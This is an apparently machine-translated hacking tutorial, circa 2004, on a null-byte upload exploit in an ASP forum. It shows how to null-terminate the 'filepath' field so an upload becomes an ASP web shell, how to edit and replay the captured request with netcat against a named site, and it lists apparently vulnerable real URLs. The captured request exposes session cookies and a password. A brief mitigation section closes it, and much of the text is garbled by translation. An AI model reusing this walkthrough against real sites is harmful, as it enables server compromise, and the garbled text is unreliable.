Upload vulnerability end

Used variables:

FILEPATH Default UploadFace Property Hiden

ACT Default Upload Property Hiden

File1 is the file you want to pass.

The key is filepath variable!

By default, our file is uploaded to WWW. ***. COM / BBS / UPLOADFACE /

The file is named by your upload time, which is this sentence in Upfile.

FileName = FormPath & Year (now) & DAY (NOW) & Hour (now) & Minute (NOW) & Second (Now) & Rannum & "& FileExt

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

We know that the data in the computer is a "/ 0" to use the C language to know.

Char data [] = "BBS"

This DATA array length is 4: B b S / 0

What if we construct a filepath as follows?

FilePath = "/ newmm.asp / 0"

We changed in 2004.09.24.08.24.

No time to change:

http://www.***.com/bbs/uploadface/200409240824.jpg

When using the filepath we constructed:

http://www.***.com/newmm.asp/0/200409240824.jpg

This detects NEWMM.ASP after receiving filepath data.

It's ending that the data for FILEPATH is over.

This way we upload files, such as C: /1.asp

Survey: http://www.***.com/newmm.asp

Third, the later complement

The vulnerability has been published in many websites, but there are not many websites that have been added to the N-Hiden attributes for FilePath's filtration and processing.

Uploading a tool or FilePath variable using tools (veteran) ... but the most basic did not change. .

And there is a similar vulnerability in the plug-in on the website, I don't want to rely on which special tools

Change the filepath variables you caught by WSE, then submit it with NC. . .

Even if he adds N hiden variables, it is not necessary.

Of course, if you do very stringent filtering for FilePath, these theories will be declared

Is our new theory birth!

Fourth, a list of vulnerabilities

http://dvd.3800cc.com/dispbbs.asp?boardid=20&idd=5369

http://dvd.3800cc.com/dispbbs.asp?boardid=20&ody=5530

http://dvd.3800cc.com/dispbbs.asp?boardid=20&id=5531

Http://dvd.3800cc.com/dispbbs.asp?boardid=20&id=5693

Http://dvd.3800cc.com/dispbbs.asp?boardid=20&id=5731

http://dvd.3800cc.com/dispbbs.asp?boardid=20&id=5746

Monitor external host

NC [-Options] Hostname Port [S] [Ports] ...

Listening to the local host

Nc -l -p port [options] [hostname] [port]

Options:

-d Detach from Console, Stealth Mode

-e prog inbound program to exec [dangerous !!]

-g Gateway Source-Routing Hop Point [S], UP TO 8

-G Num Source-Routing Pointer: 4, 8, 12, ...

-h this cruft

-i Sec4 delay Interval for Lines Sent, Ports Scanned

-L Listen Mode, for Inbound Connects

-L Listen Harder, Re-Listen on Socket Close

-N Numeric-Only IP Addresses, NO DNS

-o file hex dump of traffic

-P port local port number

-R Randomize Local and Remote Ports

-s addr local source address

-t Answer Telnet Negotiation

-u udp mode

-V Verbose [Use TWICE to Be More Verbose]

-w Secs Timeout for Connects and final net reads

-z Zero-I / O Mode [Used for Scanning]

Port Numbers CAN Be Individual or Ranges: m-n [incult]

Detailed example:

-----------------------------

First, WSE caution (save to 1.txt): post /bbs/upphoto/upfile.asp http / 1.1

Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / x-shockwave-flash, application / vnd.ms-power, application / vnd.ms-powerpoint, application / msword, * / *

Referer: http://www.xin126.com/bbs/upphoto/upload.asp

Accept-language: zh-cn

Content-type: multipart / form-data; boundary = ----------- 7D423A138D0278

Accept-encoding: Gzip, deflate

User-agent: mozilla / 4.0 (compatible; msie 6.0; windows nt 5.1; .NET CLR 1.1.4322)

Host: www.xin126.com

Content-Length: 1969

Connection: Keep-alive

Cache-Control: No-cache

Cookie: ASPSESSIONIDACCCCDCS = NJHCPHPALBCANKOBECHKJANF; isCome = 1; GAMVANCOOKIES = 1; regTime = 2004% 2D9% 2D24 3% 3A39% 3A37; username = szjwwwww; pass = 5211314; dl = 0; userID = 62; ltStyle = 0; loginTry = 1; Userpass = EB03F6C72908FD84

---------------------------- 7D423A138D0278

Content-disposition: form-data; name = "filepath"

../Medias/myphoto/

---------------------------- 7D423A138D0278

...

Upload

--------------- 7D423A138D0278 -----------------

Second, UltraEdit opens 1.TXT change data:

......

---------------------------- 7D423A138D0278

Content-disposition: form-data; name = "filepath"

/NEWMM.ASP█ <=== This black represents a space is 0x20, it is possible to change to 0x00.

......

----------------------------

Third, recalculate the length of the cookies, then NC submit

NC -VV www.xin126.com 80 <1.txt

UltraEdit is a 16-bit editor online you can download

We mainly used to write that end conscript: / 0 ====> 16 reputation: 0x00 or 00H

In fact, when you change, you will add a 00 in the end of FilePath.

Calculate the cookies length ===> After you change the fillevath, it is definitely or or -cookies.

......

Host: www.xin126.com

Content-Length: 1969 <====== is this

Connection: Keep-alive

Cache-Control: No-cache ......

Calculate? One letter, number is 1

For the solution to the upload vulnerability: (for reference only)

1. General upload is to process upload paths as a variable

===> Our policy is to turn the filepath into constants. . .

This method is the most effective current (I think)

2, strengthen the processing of / 0, it turns out that we are here to end

We continue to read the place where the next variable is started, and it is OK.